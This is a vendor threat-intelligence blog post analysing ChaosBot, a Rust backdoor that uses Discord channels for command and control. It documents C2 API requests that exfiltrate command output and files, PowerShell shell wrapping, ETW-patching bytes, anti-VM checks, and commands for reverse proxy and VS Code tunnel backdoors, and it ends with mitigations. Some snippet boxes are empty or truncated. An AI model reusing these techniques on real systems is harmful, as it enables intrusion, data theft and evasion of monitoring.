.svg)
.svg)
New Rust Malware "ChaosBot" Leverages Discord for Stealthy Command and Control
The sophisticated, Rust-based malware, dubbed ChaosBot, has been exposed utilizing the Discord platform for its Command and Control (C2) operations. This isn't your average botnet; it's a new generation of threat that hides its malicious traffic by communicating over the popular, legitimate service [1].
ChaosBot operates by validating its credentials with the Discord API, then creating a private text channel named after its victim's computer. This channel serves as an interactive, covert shell. Attackers send commands, such as shell, download, and scr (screenshot), directly into the channel, and the victim machine sends the results back as attached files. Further compounding the danger, the malware uses anti-analysis techniques like patching the Windows ETW function and checking for Virtual Machine MAC addresses to stay off the radar of security researchers.
This blog post offers a comprehensive analysis of the ChaosBot malware, detailing its unique infection chain and Discord-based Command and Control (C2). We conclude with essential mitigation strategies.
Attack Vector and Initial Access
The initial intrusion was facilitated by compromised credentials for both CiscoVPN and an over-privileged Active Directory account named "serviceaccount." The attackers leveraged this access to deploy and execute ChaosBot using WMI (Windows Management Instrumentation) for remote command execution across the network.
The ChaosBot payload, disguised as msedge_elf.dll, was executed via DLL side-loading against the legitimate Microsoft Edge component identity_helper.exe from the C:\Users\Public\Libraries directory.
Alternate Initial Access: Malicious Shortcut Phishing
In an alternative and equally insidious method, ChaosBot operators employ phishing campaigns that use malicious Windows Shortcut (.lnk) files. These shortcuts are designed to appear as legitimate correspondence from the State Bank of Vietnam.
The shortcut executes a PowerShell command that serves two purposes:
- Downloads and executes the ChaosBot malware.
- Simultaneously downloads and opens an innocuous PDF document to mislead the victim, providing a deceptive cover for the infection.
|
The PowerShell snippet responsible for this decoy and deployment is shown below: |
The document is designed to look like a highly official communication from a major Vietnamese government body:
-
NGÂN HÀNG NHÀ NƯỚC VIỆT NAM translates to the State Bank of Vietnam (the country's central bank). This immediately lends maximum credibility to the document.
-
CHI NHÁNH KHU VỰC 6 means Area/Region 6 Branch. This specifies a particular branch of the central bank, making the notice seem more targeted and relevant.
-
Số: 2557 /KV6-TTKQ is the official reference number and code, mimicking a standard government document identifier.
-
V/v Thông báo về việc thực hiện các yêu cầu quản lý, giám sát mới đối với tổ chức tín dụng và ngân hàng từ ngày 01/10 translates to the subject: "Notice on the implementation of new management and supervision requirements for credit institutions and banks from October 1st."
In short, the decoy PDF is a fake, highly formal official regulatory notice from the central bank, instructing financial institutions on new compliance and oversight requirements.
ChaosBot's Discord-Based C2 Protocol
ChaosBot is written in the Rust programming language, leveraging either the reqwest or serenity library for API interactions. The malware is configured with a Discord bot token, Guild (server) ID, and Channel ID.
1. Token Validation and Initial Check-in
The malware first validates its bot token with a simple GET request to the Discord API:
|
GET hxxps://discord[.]com/api/v10/users/@me |
This action requires the bot token to be correctly formatted in the Authorization header, as demonstrated in this snippet of disassembled instructions, which show the construction of the "Bot " prefix and the subsequent call to send the request:
|
try { |
2. Creating a Victim Channel
Upon successful validation, ChaosBot creates a new, dedicated channel within the threat actor's Discord server, naming it after the victim's computer name.
|
POST hxxps://discord[.]com/api/v10/guilds/<THREAT_ACTOR_GUILD_ID>/channels {"name":"<VICTIM_COMPUTER_NAME>","type":0} |
The malware then sends an initial message to the general channel, notifying the operators of the new compromise:
|
{"content":"Host <VICTIM_COMPUTER_NAME> connected, channel created: <#<NEW_VICTIM_CHANNEL_ID>>"} |
Intriguingly, the general channel across all known affiliated servers is named "常规" (meaning "regular" or "general" in Chinese), which may suggest the operators are using a Chinese version of Discord.
3. Command Execution and Data Exfiltration
ChaosBot operates via a continuous loop, checking for new messages (commands) in the victim's dedicated Discord channel. The primary command for lateral movement and reconnaissance is shell.
A key technical detail for post-execution: when running shell commands, the malware uses a consistent PowerShell command line that forces UTF8 encoding for the output:
|
powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; <SOME_COMMAND> " |
After command execution, the results, whether stdout/stderr from a shell command, a screenshot, or a file—are exfiltrated back to the channel as an attachment using the multipart/form-data format:
|
POST hxxps://discord[.]com/api/v10/channels/<NEW_VICTIM_CHANNEL_ID>/messages HTTP/1.1 |
This interaction is highly effective, giving the attacker a seamless, interactive shell experience via Discord:
- ChaosBot APP 11:10 PM shell systeminfo (Command to victim machine)
- Host Name: DESKTOP-LI1QSPG OS Name: Microsoft Windows 10 Pro (Results from victim machine)
ChaosBot Command Capabilities
|
Command |
Description |
|
shell <command> |
Executes command via PowerShell and uploads output to Discord channel as a TXT file. |
|
download <url> <path> |
Downloads a file from the internet to the victim device. |
|
scr |
Captures a screenshot of the victim device and uploads it to the Discord channel as a PNG file. |
|
upload <src_path> |
Uploads a specified file from the victim device to the Discord channel. |
Evasion and Persistence Techniques
ChaosBot employs sophisticated techniques to evade detection and analysis.
ETW Evasion (Event Tracing for Windows)
New variants patch the first few instructions of ntdll!EtwEventWrite in memory, specifically by replacing the initial instructions with xor eax, eax followed by ret. This successfully disables ETW telemetry for the process, hindering EDR (Endpoint Detection and Response) and sandbox visibility.
The patching process involves first calling VirtualProtect to change memory permissions:
|
BA 03 00 00 00 mov edx, 3 |
Followed by the patching of the first few bytes with the new instructions:
|
66 C7 03 31 C0 mov word ptr [rbx], 0C031h ; xor eax, eax |
Anti-VM Check
The malware checks the system's MAC addresses against known prefixes for Virtual Machines like VMWare (00:0C:29, 00:50:56, 00:05:69) and VirtualBox (08:00:27). If a match is found, the malware halts execution to evade analysis in sandboxed environments.
|
loc_7FF7561171A4: ; 00:0C:29 -> VMware, Inc. |
Post-Compromise: Reverse Proxy and Secondary Backdoors
Following initial compromise, the threat actors immediately focused on establishing persistent access and bypassing perimeter controls.
Fast Reverse Proxy (FRP) Deployment
The download and shell commands were used to deploy and execute the legitimate tool fast reverse proxy (frp), saving the executable as node.exe and the configuration as node.ini in the Public user directory.
shell c:\\users\\public\\music\\node.exe -c c:\\users\\public\\music\\node.ini
The configuration shows the proxy is set to connect to an Amazon Web Services (AWS) IP in the Asia Pacific (Hong Kong) region, allowing for persistent, covert access:
|
#frpc.ini [common] |
Experimentation with VS Code Tunnels
Attackers also attempted to set up an additional backdoor using the legitimate Visual Studio Code Tunnel service. While the command ultimately failed due to a lack of interactive handling for the required authentication prompt (Microsoft Account or GitHub), it reveals an active effort to experiment with and leverage trusted cloud service features for command/script execution capabilities.
|
shell (echo | c:\\users\\public\\music\\code.exe tunnel service install > c:\\users\\public\\music\\log) |
Recommendations and Mitigations
The ChaosBot analysis provides clear takeaways for strengthening security posture:
-
Enforce Strong Authentication: Immediately implement Multi-Factor Authentication (MFA) for all external access points (e.g., VPN) and privileged accounts (e.g., Active Directory service accounts) to prevent credential compromise-based initial access.
-
Restrict WMI Use: Monitor and restrict WMI usage, especially for command execution from service accounts. Treat all remote WMI execution as highly suspicious.
-
Monitor Discord Traffic: Actively monitor for unusual HTTP/S traffic to Discord API endpoints, particularly POST requests containing bot tokens, which is a key indicator of C2 activity.
-
Enforce Application Whitelisting: Implement application control solutions to prevent the execution of unauthorized payloads like msedge_elf.dll and known suspicious programs (node.exe, frpc.exe, etc.) from unapproved locations like the Public user profile directories.
-
Educate on Phishing: Conduct regular training on phishing threats, emphasizing the risks associated with unexpected files, especially shortcut (.lnk) files, even if they appear to lead to legitimate documents.
-
Monitor for Evasion: Ensure EDR solutions are configured to detect and prevent common memory-patching techniques like the EtwEventWrite hook utilized by ChaosBot.
How Picus Helps Defend Against ChaosBot Malware Attacks?
The Picus Security Validation Platform safely simulates the ChaosBot malware campaign. Through the Picus Threat Library, it replicates the tactics, techniques, and procedures (TTPs) observed in these campaigns to reveal detection and prevention gaps across EDR, NGFW, and SIEM technologies, before adversaries can exploit them.
You can also test your defenses against hundreds of other malware variants, such as SnipBot, SlipScreen Loader, RustyClaw, within minutes with a 14-day free trial of the Picus Platform.
|
Threat ID |
Threat Name |
Attack Module |
|
47754 |
ChaosBot Backdoor Malware Download Threat |
Network Infiltration |
|
60321 |
ChaosBot Backdoor Malware Email Threat |
Email Infiltration |
References
[1] “New Rust Malware ‘ChaosBot’ Uses Discord for Command and Control,” eSentire, Oct. 09, 2025. Available: https://www.esentire.com/blog/new-rust-malware-chaosbot-uses-discord-for-command-and-control. [Accessed: Oct. 17, 2025]
